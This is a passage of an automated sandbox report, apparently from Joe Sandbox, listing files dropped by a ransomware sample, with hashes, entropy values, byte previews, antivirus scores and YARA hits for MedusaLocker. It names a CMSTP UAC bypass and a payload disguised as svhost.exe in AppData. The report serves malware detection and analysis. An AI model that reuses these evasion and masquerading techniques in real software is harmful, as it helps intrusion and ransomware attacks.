                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):244417048
                                    Entropy (8bit):6.919251884180285
                                    Encrypted:false
                                    SSDEEP:6291456:4hpELQzJo3S/buKi8FpgpeNcOf77ntTVU5EAb2XO9oo:+pELQzWKi8FpgpeNcOf77ntTVU5EAb20
                                    MD5:691663F587683CDDDE61CDF8B5EC6404
                                    SHA1:C520C74D6B599D1A9FD656D87C1657F4F6079ABB
                                    SHA-256:4751B85861F5F619F7D7080483CD261776ED7011B69F8C1E65015F419DF707C6
                                    SHA-512:AE6D4C0CB687052CA666BA0B123A0B156C8AC01BCD897E6F9A92841A9D8CFEAA3274F1836E262C4EB6E3E0C3E51463DB899F97173E246175FD562D8F24E44200
                                    Malicious:false
                                    Preview:>|.6......=........?3W..4.|\....`..,9.Y...F.J.bgK.c3.Fd.A.....}..............dj..~.'....W%.....e..F.@.^.&.|5}.p*..&.......VV.....:&.w._p.H..2.*Q..>....>.....Yj....lG... .6.c.l.Nj./.%IK|k4...hyR...).ie.h+......c.p.+,...7M.....p.w....&.$X...KG..>F...?.G..M..m.eQ..!...Pb.....l%.&>._.z.o..t.\.....mn...&.f;+`.>....U.....w...i.i.l....z............xY..{.R.....$..B[LLj.yo(..l..'N9..l....n...a...(.>......0.A..w.y..m....9.V....fi.V....~,w^.-P,w5tK.K......s..vp...F.M.!.......>#....Fd.:.K.Xs.A.xwV-.A..i..?-.vd.;.:O.....r.(C'.v@.7p..s9.'.0.AO.x8..p*.....%.!~$..W..%.....A.....>....p...a@].`:..].........*-...~.Vt../~..s...#...v.sd......*FwB......f./...{.9.n.|..kR].'..oW.). ......BQ.d.x....g2DG..9.G7.D.9|..:..:......WCT.....N..$..........mh..e.{.W.b..C...\!.`.$....z=.@........}!..Mt.d....`'.W....Y.._..cvZh.[..@.F..E!.0E........O.e..a.D.u.].8..).Q...^AwK.........|>..l....sv..@V.%xs0....o$...|'...y.B..9).......S.h,x.<..C9s.|.*......... .{...@.?..bO.......By
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2794008
                                    Entropy (8bit):7.999941320269777
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:AC659E4C7691EDE84A6467A87EFAA20B
                                    SHA1:16A86243CF9C1D89243FE7C492039D433BDC8BE3
                                    SHA-256:96523C790EF43C8016D2EC904A2D739176B64B4D557ECE51C4846AA52E54FB3E
                                    SHA-512:E9B52756F8C82FF715813168D6465D217EDAF47B870081235646A0CB855DBAA4C8F1E95D05002EEA32B32C78FFDC227E53C77F741FA71A1433A7B53511FC5DB9
                                    Malicious:true
                                    Preview:>|.6......=.......V....W..\{..]......r.....3Y..]..j.|...@0&.....*1..F.n5wLP.gc...F.'YO.J,.A..t.n..Nbt...Mb.3..i.....}.k....)..`~h).....4`jh...?P7K.0..-........L......"'D...Ux..Z.A.T@.;.6...@|@.Yq9Y.{.C......^....w...j...;^...WV{..t.;.V.~...L4..W....$.isSu....."..\.M.F.+.}...@.i<N......./.C..1......[.!m..{.......N...l."....L..u.LJ.X#.hdb,.Ko.V.n..CVj...`.~...3j:.R..uAXE.....L.`......>0....8..V2#.k.F.rV..M.ax.Y.Z..Dm}..>....o.ia0..G..68..\....-T......1x.....z{H.7..x..x.$.Q1B.u..P..b.K."...M.....CX....iFH....K.$u..}I...?.OZ.N..rM..n5.E...R.!.a=:..p.....ub...0"r@..!2....]......@..xBv..ue.Lj_*}.*:....n(..F..q..-. .;..........M&.OJ..H........%..`.,..g....&....O....9.....c.. ..H.......L.@.).1%.K...zV./t.|..7.E.L.[.B)Giz.....U...-.:...|].}.9...EB.....V'..2....I.w..s9..$;.X.h......$.A.zi...A.....&(h..-D...m..8KN.o;.c..2'...{L....s;Lg`....i..._t..Px-X]......_j..&.b..m.&.iQ.O" 7.L..Q..\.....y..7...B.`./.N..|e....t.XV.%.v..XX.....cs%a*;..R.... ....n..o
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):175114579
                                    Entropy (8bit):6.997748181847772
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:811E47ECC528DF476FAFAEA27C7AFCAE
                                    SHA1:4B4E001D2F6E22F82CE1E8543DCAFB6B3B7499DB
                                    SHA-256:04A0C34707FC04A15F8AC4FF8AB6121BADD6B8F51F20A3FAB504D48BF3B9A3AD
                                    SHA-512:AA8D82F2B478843EBAB4B7EC46DE1D093E6B8FF4929E51D9B3F927CDE00CFCF6BC4A4E09F2F5A35D39A093A19288AA03D8B2D71B3275DCA952A7677D0E2E0D65
                                    Malicious:false
                                    Preview:"..S2.l,@.....(.*..o...sA.....r...\.{....h.{.,.h.6.6....B.r..S.d...V.j.&....;..*....I..Ry.&........C..7% .g.|.....;....tQ.^..k`.E.`-....3U.usj..5..l..../...Z^l!.2@u8~..A(o.$-.Of......S.W9,....7x.].....S..*.2...=..x..f.....HDJ...e....!.BM9.+.e.tUK.<.[.........L.U4..........~.Z../).bY..f.j..[..........4+,...x7..Y.ZF..u..+........Y.`:-..}...^..u..W~q~9<Ek.s..n...e`..4.+.xK..........:>..G>..z.u.o.4L.....Y!.%../..Pn.$.n..$}&kA...>...Q....Z>.XN.]jn.&>..,..)....r....r.0_...=..1$..FA..AEL...T.....@..-O.5.*.z..O&..,:f[.....L9q.....<.;...#....Th.|..q.i.~;...._|,H..B.E..........Mg.9...@n..~+..3.....3.".^v.t.l....d?..k).I+.i.!.>...g...M..+i.-W...vwde..K....Cu-Y.hq....5kb.....S...`.._...E.|<7....=Ti.....k...;K.Q........_.2.....;.'......J......8_>.y^.R-..y#.(........C....W...P......}.M..n.!....4.6Na.b#.eF,.Q2..p...v....Y.....V.X..0......v..Iz...K.E:}..T,.X}.9..!}.....`.c....U.QB.z.y.......~...5.....Yi..........q......@..6G...<.J..s5/bC..*ne.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.975821602327213
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DEE9144F23E2ADC461C4F884D76F3D9E
                                    SHA1:2CEF7363EB4936FEBC8722AD655477EC56455E53
                                    SHA-256:5F195EC629E3D957FD28DBC8FC2DDBBB55550505F5B78C2893966946EC1B1EE3
                                    SHA-512:30E7766A7C811A890FCA56CB9D526730E122CFDACA251607974CA938505EE6E4567D8FF40FC24058D6B0DB96A54392E976A06F4D6C8632060D69CF53BD2C527C
                                    Malicious:false
                                    Preview:.pi..2S.s^R.P\..mR....Y...=F\.d.7../...g...C*|\.iY9a$....~^. ...9..j..bI..g....\~I..../w...G.e.c)....a..+f..D.}..-PI...NJ .K<L.t.....U...1.V2u..(1R.......D.....KB..jo..n.U.F....9t..@......8...^.....#.A......;x.E...H......9\$.&.W..,.....E|RF.e+.,y..:f........db..A.x...*...y*.|...3W......=.}.d..J..5..yk. O.p>...E...6.Bp0HL......(...?8....Q..c...g.9]...j&..N.(.rS..O......r..v...E...Q1~....kX.~_....K..g.{....>(.y?rC"..[|..?{.2.B..9n.0.f.--......G...M.......T.IN.k...s.r(9...FH..a....F....2.>.9J6.6..(.Y#l.....IO..g.sZ.`.['..h..7..=...H....V.nc.Z..1.....)!.{.J.....5.N.O.m...ug..C..v. :^<X....%f..$0.91......S..H."Vm....]ae...].)....-f......L...%..j....e....FQ(( ..L..........=..d7>[.M.NY.....7.!..6.vHM.,..^.3.u...P..lm......X1.ks........)....PM..7......U...........k.......gPE-Sg........Y.............3......fu.^.(......._.1.-.T..@.6..3.p'.6./....J+.kz.V.......i-.....G....V....`.n. G..+.kU..$C...."..$..%[.K~...j|.Sm.....~..q..-...EwR?'.|..
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:DOS executable (COM)
                                    Category:dropped
                                    Size (bytes):367239878
                                    Entropy (8bit):7.999581729841427
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:EA4FC44AA0DD9A4413B59910823A6EF3
                                    SHA1:61A52D24BC41BAF79D32D14F2B7F3208FA7BF90A
                                    SHA-256:129A789830A786AFD7AD369CA768E090691F3FFC5F27E99EDDB13760769ED4DB
                                    SHA-512:ADE0A08B84129DF38AD8F8D016DA2433347988DCED5C7214CC5BAF5DF6128EC1373670EB69716DF993B5C8081F42B881618D8D50479A0C8ABBA2A3F49E06746D
                                    Malicious:true
                                    Preview:...xw..B.._. ...o.1........}...8.q...!.}~,....:x&u....&....<Dp.V..Gd..I.X..1'q.<z.........ZY.v.$.y.r.._..p...L.1.O..8.......W...{I)..4J......ve..dCC|3J..:s.q.'.`.f..<..<N4.Iz!...{..g.P.,.N.......~.......`./S%..G..y.z.....g.|}.*......$$..q...~."....l........t..2'.75)..[....p.hE.....;s...??......q.a.....:......C.)4...OTOt..Ox5.S.x....v]3^...).]....X..+..&...0o...)..o..C.L..)....n{.....*..3{......[.>.../4.F.3.....xm[.........-.K.vu..x.j.S."=6...SC[sP..].x,i..J..O....... /.HB.........Z ..G.T.{b#8.W....$.....@K..3-Wg~.]..\b.Dr-8.yg....#I.......|M.e.4mNF.E.p....+.:...kX....w..P..l/.8../4........#...x.H4VrW.i.....j.a]...+....!.6.=.).$.:.2E.1.Z...h..b.g}PO........Z0.t.\.7(1....X..M.+............].sBz.m.@.V..`..&......@.b.4o.V:.<.......r.gz..N..s...`..M..*Z..Q. .3=.w.Q.Kj..x.A.."[.'..d...:.#.<.`A.1..\D.O.l.....7'..v.Jkk..||...d...}D..P3<l@J.o...H....VmY......z>.%...!..w..4...~(;.Gg'J.Y..g.....tW...B.._^......H.F...W..+$..}{.S.< M.0
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3170840
                                    Entropy (8bit):7.999931844895833
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:31230714AD686244A1E1692A96599057
                                    SHA1:8578AEA64F22DAC0B9801F71B1C19EE138D6CB6F
                                    SHA-256:8D01CFF40ABE924D6022A371040C0970297A6A2B50B6138EDA2900A2FC7D068B
                                    SHA-512:EED2B1AEA32A4FAF480526BDC7559951CC44408B521C71020E02EBD02D534A359F985F3D2203EDCCD4035B5CD046B530B9058EBED1B5D84ADBA2D3D2CE7F38B6
                                    Malicious:true
                                    Preview:.m.....x.IO..Oi?.-.$./.Y6.X....O.c|U...)...K.#M..........:$xP.sP ..UR..5?0.i3.s.HcZ5G.'.....>.0+....x.lptsa....\..\.V1].ZT.".h.A..o..F.#...Db...*r..f&..D.........m..C..#..>.w..6..y..F+..a....g.O8.9._..(....z.[..`.&....v3...26.>...u..{D..\y2..'Z...C.].....^h.....R.i..9,p.?..q...g..:.)-"9D.U..4.w..GA...S.c.R....MK.[....Y.8.....g...3.I.o.b...|8........j.|...B2...z....n. .w,Z..L//.}.:..d`.....-...v"...D;N.f.t+.y.pz....t.`...#*{.9k.v.."K.....i....S'SA}..}..#..5..yT...@...rS.'.|..P..l%....SJ.I}..@&......mK....../.).L....1.\.}...I....4..oA0M.`m..+h...GC..\.~.Z..l}.....<.{..H...-. (...eN(.X.%.I....:...U..J...*...x........f9..)E....^.....M...r../....rv......$:ho...p<..P.......;.y4..u...>.u...w%.a.....}Amo.[[.?....f.V.z.}.T\.....|.....>'...~..cT.{3|...U..)`..so%...t8..~*N.h.C....K.h.|..Q.8.H.}...A*.A.........m.}.,)....:..).....L.X....v4.l.....c.K<..]......'*...7_...k.....hP.l'........:.{S.V.?..3....U.H....S..,.t@..v.~....8.9Dy.....m..fgF.J......|...
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):46
                                    Entropy (8bit):1.0424600748477153
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:89CA7E02D8B79ED50986F098D5686EC9
                                    SHA1:A602E0D4398F00C827BFCF711066E67718CA1377
                                    SHA-256:30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
                                    SHA-512:C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
                                    Malicious:false
                                    Preview:........................................user.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):685568
                                    Entropy (8bit):6.189424744316123
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:646698572AFBBF24F50EC5681FEB2DB7
                                    SHA1:70530BC23BAD38E6AEE66CBB2C2F58A96A18FB79
                                    SHA-256:26AF2222204FCA27C0FDABF9EEFBFDB638A8A9322B297119F85CCE3C708090F0
                                    SHA-512:89BAD552A3C0D8B28550957872561D03BF239D2708D616F21CBF22E58AE749542B07EEE00FEDAC6FDB83C5969F50EA0F56FC103264A164671A94E156F73F160A
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: Joe Security
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekSHen
                                    • Rule: MALWARE_Win_MedusaLocker, Description: Detects MedusaLocker ransomware, Source: C:\Users\user\AppData\Roaming\svhost.exe, Author: ditekshen
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 90%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..CP.CP.CP..8.RP..8..P..8.TP..8.BP..;.[P..;..P..;.gP..8..TP.CP...P.u<.NP.u<..BP.u<.BP.RichCP.........................PE..L...hz.].................,...X......'........@....@.......................................@.................................x........@.......................P..|Z...S..8...................|T.......S..@............@.. ............................text....+.......,.................. ..`.rdata.......@.......0..............@..@.data...hK.......:..................@....rsrc........@......................@..@.reloc..|Z...P...\..................@..B........................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.980472078831073
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A5CAF994071319D5193D235FD0A7EC82
                                    SHA1:4AF48395BA61E035681B5686875DA8B200484BFF
                                    SHA-256:0AE71D04CA886C34F67FD6792D3A783167D394B58F763678EC1266B2DA6F4A08
                                    SHA-512:DDD4639BEAC51D6D0DE437DEE9A087A92C8A38AF5F6D42653A478248B0A3FC3C0D7E65C976E74A64BF528E0C26362FB0D06F631F2848C4E2D45D9D3DF158F750
                                    Malicious:false
                                    Preview:...r....V.......:.t.,....3.+...."!]....5.6.'b...,j....../.....)2x..$.....C#.zf..a..<.....9...@.&.;~........Zq..L5..:UF...<oh.+O.$..%..J....n.Y......(./...:.Fw.,.G[..R..F.M.(5.I.$D..xA..lh....+C.W..-@....6.9.....S. q..[j...T....\.....-^6...`.4W.]97.1.V.....|@.(k.&.mi.E.@,.M.......$...4./..(.*.....dJ.b.>.....4.Nn@YRZ....d.f....=.)9.........z.....0.z......&.2....yNh._.O1......8h..`.o..N...S,....w.DGkr.1.4../..k..r2'...A..z.@.......9.!......d...h{~..Ag.p*}..0..#.....h.@?............7.JV...}6..n7....<.x.i........h.....>Y.Cx H..G../4?..V...[..U......u.x.w..e.6.....pV.%4U\~E.$.!.F... .zE...(.n.?.je+.:.........uq{....{|...$....y.1+.....p...ml^..w.}N..~.a.N.&L.d@..~<<2R.....[.C>Kp.....b+..fu-.?.............D...w&vr.3./../.\.6......[......*Iy.@0c'[....L.`5.<3..S......2!#......S.Yn.h.;\...dF.....:.J!.y.n.... .,..I...>%.y.[.ynp.l........L....utB[.f.K....9....z{..:.~...;.r.g...uO%T....{R.'.....2>R.O..%...vk}....m.(..,`<.1.v)..g+..~I..j.*..\.2
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.980472078831073
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:A5CAF994071319D5193D235FD0A7EC82
                                    SHA1:4AF48395BA61E035681B5686875DA8B200484BFF
                                    SHA-256:0AE71D04CA886C34F67FD6792D3A783167D394B58F763678EC1266B2DA6F4A08
                                    SHA-512:DDD4639BEAC51D6D0DE437DEE9A087A92C8A38AF5F6D42653A478248B0A3FC3C0D7E65C976E74A64BF528E0C26362FB0D06F631F2848C4E2D45D9D3DF158F750
                                    Malicious:false
                                    Preview:...r....V.......:.t.,....3.+...."!]....5.6.'b...,j....../.....)2x..$.....C#.zf..a..<.....9...@.&.;~........Zq..L5..:UF...<oh.+O.$..%..J....n.Y......(./...:.Fw.,.G[..R..F.M.(5.I.$D..xA..lh....+C.W..-@....6.9.....S. q..[j...T....\.....-^6...`.4W.]97.1.V.....|@.(k.&.mi.E.@,.M.......$...4./..(.*.....dJ.b.>.....4.Nn@YRZ....d.f....=.)9.........z.....0.z......&.2....yNh._.O1......8h..`.o..N...S,....w.DGkr.1.4../..k..r2'...A..z.@.......9.!......d...h{~..Ag.p*}..0..#.....h.@?............7.JV...}6..n7....<.x.i........h.....>Y.Cx H..G../4?..V...[..U......u.x.w..e.6.....pV.%4U\~E.$.!.F... .zE...(.n.?.je+.:.........uq{....{|...$....y.1+.....p...ml^..w.}N..~.a.N.&L.d@..~<<2R.....[.C>Kp.....b+..fu-.?.............D...w&vr.3./../.\.6......[......*Iy.@0c'[....L.`5.<3..S......2!#......S.Yn.h.;\...dF.....:.J!.y.n.... .,..I...>%.y.[.ynp.l........L....utB[.f.K....9....z{..:.~...;.r.g...uO%T....{R.'.....2>R.O..%...vk}....m.(..,`<.1.v)..g+..~I..j.*..\.2
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:HTML document, ASCII text, with very long lines (1135)
                                    Category:dropped
                                    Size (bytes):5047
                                    Entropy (8bit):5.370534626181164
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:745B48668275602A4548365AD585BDD5
                                    SHA1:9475B28C05AD4073C701B518750B782067E8B763
                                    SHA-256:337CD3DBA1ACE4DC908CD528A4FE238CFF34ED5DF0D2D694165753CECD894920
                                    SHA-512:361969A8F4DADA46BD78807B5D4149D6CA609505409EA2E00A4E0B30DABDAAA6984EA8BB89916EA5B78EA327E7DA25E024F6235298C1074D38304BED24E39F87
                                    Malicious:true
                                    Preview:<html>. <style type="text/css">.. body {. background-color: #f5f5f5;. }..h1, h3{. text-align: center;. text-transform: uppercase;. font-weight: normal;.}.../*---*/..tabs1{. display: block;. margin: auto;.}..tabs1 .head{. text-align: center;. float: top;. padding: 0px;. text-transform: uppercase;. font-weight: normal;. display: block;. background: #81bef7;. color: #DF0101;. font-size: 30px;.}...tabs1 .identi {. font-size: 10px;. text-align: center;. float: top;. padding: 15px;. display: block;. background: #81bef7;. color: #DFDFDF;. word-break: break-all;.}....tabs .content {. background: #f5f5f5;. /*text-align: center;*/. color: #000000;. padding: 25px 15px;. font-size: 15px;. font-weight: 400;. line-height: 20px; }. .tabs .content a {. color: #df0130;. font-size: 23px;. font-style: italic;. text-decoration: none;. line-height: 35px; }....tabs .content .text{.padding: 25px;.line-height
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997304266790072
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:23BCDF6B4CDD5B88C4901AB8DE79062E
                                    SHA1:E2241BBDAE4DD15CA1170DD9AD5876A84B56FF93
                                    SHA-256:9B82C0FE441CA4BA4C36F5500E02D1E82F27426E31EE01F9A204C8A2FC7424AB
                                    SHA-512:18C02DEA53372678ACFA64141833F14F3B60B76E98A066C75D45953F873F38B1465D1BF12242E5D15C5860D3040DBFE0E3CE2CB7D8FDA5542ED6A1C92660E33B
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s.?z.t.s.=..].....}....(.}...gE\.n...?{8.t.0. F.^....V9nn.....(..Y?.a.......;*..zs.;...i9.WD..AB7...../@+.q%4;K.|..}T.V.)C........=...k.`}%K.....).2U+..`IzZ#.....QlR...n5.....7.)...L.m.FZ..L..5N".d...a.!P....D...\5.EK+.E..yqu>......T...Nr.\...Pg....K.P...z...g. ....=....{].JV.%.......=n-....-rn...hl....../x..8..GV..fH..L..W.....+.O.?.8...]T.y..h,.hl.m@@..........$..L`Vw.k.c..... 2.y.S1...2..l1a....]M..W......3.'%L_...%&xP.ee.b...=..,...y3.....[..J.].2.*.#.NdVF.......G4.)......X..rv....-.;...u......'..W2..|...#. .`B..'$.H.K..e.=..1."Q.t.<x...l..F.T".x..XC...9........x(........tY..:..kB...w.u.....$....h...Ut.."r.DI.b..d{.........~D.;.@."...q.E!.....?....!^."a...H{..^VM....{...h...uT.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):82456
                                    Entropy (8bit):7.997542530776212
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:911DD3F933998EA4F97043CF39CF8966
                                    SHA1:89A99BEAB6C5318A814A98DC999B7B0DFFD04DE0
                                    SHA-256:AEC0628A94A3FAB5E8A5D7325D49444878894B8E038FCF71F47A15F2242904F6
                                    SHA-512:44F65B339361605624EC37BCFAF184C7375EC9653700B876981B40A5DD0124767D80F6E642C54F931EA39CB8AA5775B8A5DBBB205ABA7ACE663E08C0AD8705D8
                                    Malicious:true
                                    Preview:..-.._..j_8~....Q.._.S.v6..y.^.x...}T.#q..]4.|!.ORz..'.b%'fgg.f.~i.r.. ..-.r..)K...L.&..n........m.7W?.6.D.y?.+.u.z.9#+...k.Et.-..c*Il.Z3..B.b]:D .M...#..\."x.`6;.W.A...H ..W..\.#;Lf..3Qj...!h.| b.9......iw..Hs..v..%..o...s."I..r..{X3?L'....?g.......4....I1...s...B.k.9...D&....U.}<../=.......6.8cc8W......"..Aj.c...m...W..v8.:.......q..c..................'..)s..}....^].M.)C..M....Ywlw....M..rP.R.W.7.7L.&.i.I.....].~x.....B.........K..I.]..4..".a.O.D.L..pZ..%.P..$R..?0....*."...E...)-/.%....j.,.j....3.1aM.&......b..Q..L0o].b..I.g.q........x._.pt.Tg[.Q..w..a...>../`....dt...O......3.e.H.{&.=.o.C.)..!...........r....B.,....%.^....%v....l...(.......4.hkpt[..R....|rO...U.3.S*..F...g..5.X....o..5..........ir.G.......",.J{.U)........pp...Lhr}+.M.f.?K.u.B.pO....T.r..).....1..w.4.4.#b ...w..S.G...p;.O8.d494$..vD.x....Z.....J.7..h?....HF... .....O.}z-.....&...s.6.G-R..|...u...G...W....()N.. ...]T.NW@.1.ipI.F..{..8...V....}.'..*.......*i!.n.l.y.U.}...~.f.9.
                                    Process:C:\Users\user\Desktop\98j0BL6iLT.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8728
                                    Entropy (8bit):7.977106146342546
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:15A7E4840964F45D697AA42825282A64
                                    SHA1:8B025EBAAB1CE204C05C07ECED045BAC33504AD7
                                    SHA-256:0F7767FC96133CDDE48642E650955242C1DAADEE1548F4E14CBB03609F36D1B6
                                    SHA-512:543A8C0B23E745C60F612F545CAFA2354ACA2DCB728192728D163880762BE6ECD2CD0093E2F0E9A6FE4FF05B160D65F56471D0DA6D5CD64E16C0525B3E8C73A0
                                    Malicious:false
